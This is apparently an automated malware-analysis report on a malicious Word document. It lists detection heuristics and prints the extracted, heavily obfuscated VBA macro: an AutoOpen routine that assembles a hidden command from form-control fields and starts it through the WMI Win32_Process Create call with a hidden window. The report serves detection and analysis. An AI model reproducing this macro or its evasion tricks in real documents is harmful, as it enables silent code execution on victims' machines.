MALICIOUS
250
Risk Score
Heuristics 8
-
ClamAV: Doc.Malware.Sagent-6971199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6971199-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7954 bytes |
SHA-256: 9b8d702396a50184e0d4c8678068c6d9669caf77c485ce0886656f624034302f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "U7__0_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "E15741"
Attribute VB_Base = "0{385981A0-4F92-4FC0-B53A-3F985D0E0E8D}{06DEAA44-9530-4C6C-B3CE-EC724C705645}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "l393667"
Attribute VB_Name = "F9065_1"
Attribute VB_Base = "0{A57093E9-F0B8-4071-B174-B42496A92819}{58E5F28B-A7F4-402E-A3D7-D2E8A964EF30}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J066_7_9"
Function i32_09(i2962_8)
While U5697_8 And X170170_
_
_
_
'r64934Q5_8742_E6045383r827295
'd367_5p54817_0c212_9f4460_
_
_
_
_
'W880__74M8922946z538_996f47324
Wend
While X4_14227 And c3__8958
_
_
_
'f6723_1W_8__10P179416m543_2
'z90942u00410F56902i03623_
_
_
_
_
'p1107_j63841N278940K50918
Wend
Set i32_09 = CVar(i2962_8)
While j44183 And D607075
_
_
_
'O_49_773f4_489_0c438309G6306_35
'n8087341t_9814i629_3_3b55472_
_
_
_
_
'k7509852b9216997j850_780h82832
Wend
While U8061626 And j830889
_
_
_
'H3260166J190792r652582N35619
'P3156_5V0982773n28982b_81_3
_
_
_
_
'w2246_1O27270X068544u334_787
Wend
While W60917 And V4192007
_
_
_
'q_90805i3__3419U16160_G47836
'U70141j65051N65403C1942686
_
_
_
_
'j3_41_s5710146F23272_3H39_135
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While c23943_ And E6597021
_
_
_
'r666_5s744_08m400180D584536
'z184459X977256W2908045a3100482
_
_
_
_
'A61_350M40_610R9__01W_8353
Wend
While Z742_8 And V399362
_
_
_
'r12642i6_85719t8885_2K463887
'J625434p_88151X28259b23410_5
_
_
_
_
'R55553f_6423H6_115_F_492936
Wend
While L07923_6 And A__77_9
_
_
_
'w51477i55_289w417411W29428
'B437121E55033z53784d2_05493
_
_
_
_
'Y5002__1H3309123T_396129j3269752
Wend
Call S8931_
While m4946477 And w51656
_
_
_
'w4582833I1060493M3737231z907085
'E13106X698359i22_6239L48309_
_
_
_
_
'z3991897n5112_4_v141251r_35_6
Wend
While Y784536_ And s38_8679
_
_
_
'Y5094371w1_4543_Z33_59o67915
'n01386r94575F633305P355216
_
_
_
_
'f5_651H76385i73_0056L788993
Wend
End Sub
Attribute VB_Name = "i7131190"
Function S8931_()
On Error Resume Next
While r7483213 And B__0_88
_
_
_
'u837283A390_52X64292_8v436__
'f121_6G72_79L729_276m1990_
_
_
_
_
'Z19579w467726T97365r9854935
Wend
While D503377 And v4531452
_
_
_
'i816776Z4763048s466687i_8288
'B_478580p3497_9F279_7w03007_
_
_
_
_
'J9209814o0485866I4_4_91w75699_
Wend
D87232 = E15741.C05431.PasswordChar + F9065_1.G191_494 + E15741.C05431.ControlTipText + F9065_1.S2970591 + E15741.C05431.ControlTipText + E15741.C05431 + F9065_1.K_0_9655 + E15741.C05431.ControlSource + E15741.C05431.ControlSource + F9065_1.A5894_3 + E15741.C05431.ControlTipText + F9065_1.r87925 + E15741.C05431.ControlSource
While f082232 And c3552_
_
_
_
'r56_0807W825_0B42642N131347
'P45930E8__247u48414T95802
_
_
_
_
'K8644958V47297T36_3_t110370
Wend
While d831309 And w4_3072
_
_
_
'O4003594W60_02_4N0_469J3640041
'Z93_5_20F2_40_7b553123j17963
_
_
_
_
'n45_388D42603_P16203H10478
Wend
While E94356 And i935800
_
_
_
'm92867p91_420h822_960L0733835
'a734979T759_33o1701997m319433
_
_
_
_
't45_331F7118377Y663446r26829
Wend
Set O7915408 = i32_09(GetObject("winmgmts:Win32_P" + "rocess"))
While u936629 And J_055167
_
_
_
'z6323548X98001q_6804G0154400
'l8_135c53_65p_23706Y7182_
_
_
_
_
't422992q3625820m1502698V55557
Wend
While M8228457 And U44_3154
_
_
_
'b2245539i080894w2347446p017322
'j3282_36O589449a11__588U8736_
_
_
_
_
'X245981_F84603f4335472i3308642
Wend
While a57_790 And q48172
_
_
_
'v55_3_U_7489U37140z6_0808_
'S695451q36816S7_9126_i56479
_
_
_
_
'O4__2_6j69_413b845356W868867
Wend
O7915408.Create U5_44796 + D87232 + Q44_24, t17597, u6_1856, A_0352
While c_129371 And j88170
_
_
_
'V_357566f84347B1677574Z090_0_5
'V77327k54179J059046K49963
_
_
_
_
'P55646_1Z663_14B_3220O7432424
Wend
While W2194859 And c6767_44
_
_
_
'E1_5625n5_5_88n_31_75w_386_0_
'j42343c179_0_N1251256F017145
_
_
_
_
'h80021I2_48_v397299l8667665
Wend
End Function
Attribute VB_Name = "v55858"
Public Function u6_1856()
While s_452_ And o64211
_
_
_
'V45964r_1751A249893M6435951
'V5277917p792_208i281490L7614__
_
_
_
_
'o_72100J4309601D49_22_3V2_44_7
Wend
While T48231 And I24494
_
_
_
'E57972j38759w_515550n4924_20
'L_83566E943449q8185058t857658
_
_
_
_
'J8__56V1597141b6008__k3097578
Wend
While J653434_ And I9266__9
_
_
_
'u146460_P71795v7886477w3_09592
'u955__66l1540_3A0982_9u707480
_
_
_
_
'M97010s08_9378I13537H829859
Wend
Set u6_1856 = i32_09(GetObject("winmgmts:Win32_P" + "rocessStartup"))
While z281__1 And p7787364
_
_
_
'I74946M_80983L234__6I_3922
'E08456_j1090598m82892z469613
_
_
_
_
'H2073_3l536610s_3033B4_706
Wend
While i7439113 And a073911
_
_
_
'U73886X5_264_2n94333i58966
'H25_78i005_7H039_2s60228
_
_
_
_
'o630886G745531j7381_9G0110_
Wend
j6014__5 = vbError - vbError
While z460140 And a7921_
_
_
_
'r349583i8_3799b186339H9_531
'o097849H2009_87n412_981K60731_
_
_
_
_
't9097189q400401o0_36468f91196
Wend
While W1729992 And p81634
_
_
_
'r964035H87_2_56w60258n08088_5
'F3485_8U8971619h1824862w_9905
_
_
_
_
'O106__43j58_05W211_05W0_88_16
Wend
While z6_27044 And k_652514
_
_
_
'P8_21115Z6_15564r940873O539554
'G79_8733w909002H659495n78208
_
_
_
_
'h_287689U74030_5q5234_54v3813357
Wend
With u6_1856
While d60979 And l632123
_
_
_
'w57655Y3306402I629_025V72572
'b7324_1a324_0c02685Z50104
_
_
_
_
'R777_3V7822969A321933a3552021
Wend
While R30__203 And C9613763
_
_
_
'w_7525j50_89o79_9306i3833074
'l607577G29340_6n21549U2_54_5
_
_
_
_
'o36378l0_55453M82690z_9999
Wend
. _
ShowWindow = j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5 + j6014__5
While v1_08058 And s477851
_
_
_
'c475528X36_342B2324_0_m_204__
'i6816_3v1454513B776327T314999
_
_
_
_
'I93140L4899286D160_504i6860815
Wend
While k364127 And X1168640
_
_
_
'L4_477C35348_t32919a75727
'V518_0k764395N5867276A1008_
_
_
_
_
'O023_661G19200t90363n7080549
Wend
End With
While D36715_ And w2584743
_
_
_
'c8658276f95156B91161F61205
'O860066z42954w3506264G58220
_
_
_
_
'i__5641_z4923403p717465q240780
Wend
While S9628205 And h246957
_
_
_
'q168_8T_56_76k347_0H60292
'h9002760Y2_8698S2503379V70_6408
_
_
_
_
'E95165a_1635L_88703_j3647285
Wend
While C39_835 And r28438
_
_
_
'I49956R7310737I9229125p101716
'f797147H3_11569c88178m36920
_
_
_
_
'L52292_5i91569_m_720_10S21053
Wend
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.